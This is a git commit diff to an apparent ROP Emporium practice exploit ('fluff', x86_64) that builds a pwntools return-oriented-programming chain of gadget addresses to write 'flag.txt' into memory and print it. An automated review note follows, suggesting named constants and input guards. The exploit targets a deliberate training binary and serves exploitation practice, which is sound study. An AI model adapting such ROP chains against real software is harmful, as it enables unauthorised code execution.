authorBrett Weiland <techcrazybsw@gmail.com>2020-12-18 01:42:14 -0600
committerBrett Weiland <techcrazybsw@gmail.com>2020-12-18 01:42:14 -0600
commit406768c5fead9fcadc9dc466da4286e5ac3c7274 (patch)
tree6d546250c6dbb09b49223f0139d4ef63defc7269 /x86_64/fluff/exploit.py
parent4c25bd918847e914875e900285008eb3865ca8b6 (diff)
deleted: x86_64/badchars/core
modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core
Diffstat (limited to 'x86_64/fluff/exploit.py')
-rwxr-xr-xx86_64/fluff/exploit.py30
1 files changed, 14 insertions, 16 deletions
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
index cdf5de8..2b520d8 100755
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@@ -13,37 +13,35 @@ letter_lookups = {
def write_str(dest, string, payload):
payload += p64(0x00000000004006a3)
payload += p64(dest)
- for c in string:
- payload += p64(0x40062a)
- payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(0x0000000000400610)
+ payload += p64(1)
+ payload += p64(0x40062a)
+ payload += p64(0x4000)
+ payload += p64(letter_lookups[string[0]] - 0x3ef2)
+ payload += p64(0x400628)
+ payload += p64(0x400639)
+
+
+ for c in string[1:]:
+ payload += p64(0x40062b)
payload += p64(letter_lookups[c] - 0x3ef2)
-
payload += p64(0x0000000000400610)
- payload += p64(0)
-
+ payload += p64(1)
payload += p64(0x400628)
-
payload += p64(0x400639)
return(payload)
-prog = gdb.debug('./fluff', gdbscript='''
-break *pwnme + 151
-'''
-)
+prog = process('./fluff')
payload = b''
for c in range(40):
payload += b'a'
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
-payload += p64(0x601be0) # set rdi
-
+payload += p64(0x601be0)
payload += p64(0x0000000000400510)
-payload += b"\n"
prog.sendline(payload)
-sleep(1)
-print(str(prog.recv(), 'UTF-8'))
prog.interactive()
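Review bot: The rewritten body of write_str (the added lines between `payload += p64(dest)` and `return(payload)`) introduces seven more bare gadget addresses while the commit drops the only two comments that explained the chain (`# set rdi` and `# if things go wrong, check endian/order`), so nothing now says what 0x400610, 0x40062a versus 0x40062b, 0x400628, 0x400639 or the `- 0x3ef2` adjustment are. Since every value is tied to this one binary build, bind each to a module-level constant named from the gadget disassembly (e.g. `GADGET_A = 0x0000000000400610  # <instruction sequence from disassembly>`, name to be filled in) and put a one-line comment on the `- 0x3ef2` subtraction explaining the offset it corrects. The unrolled first iteration also indexes `string[0]` unguarded, so an empty string raises IndexError, and `letter_lookups[c]` raises KeyError for any character absent from the table (whether '.' from `'flag.txt'` is present cannot be seen here); a guard such as `if not string: return payload` or a docstring stating that `string` must be non-empty and drawn from `letter_lookups` would make the failure mode explicit. The `letter_lookups` dict that the function depends on begins before this hunk.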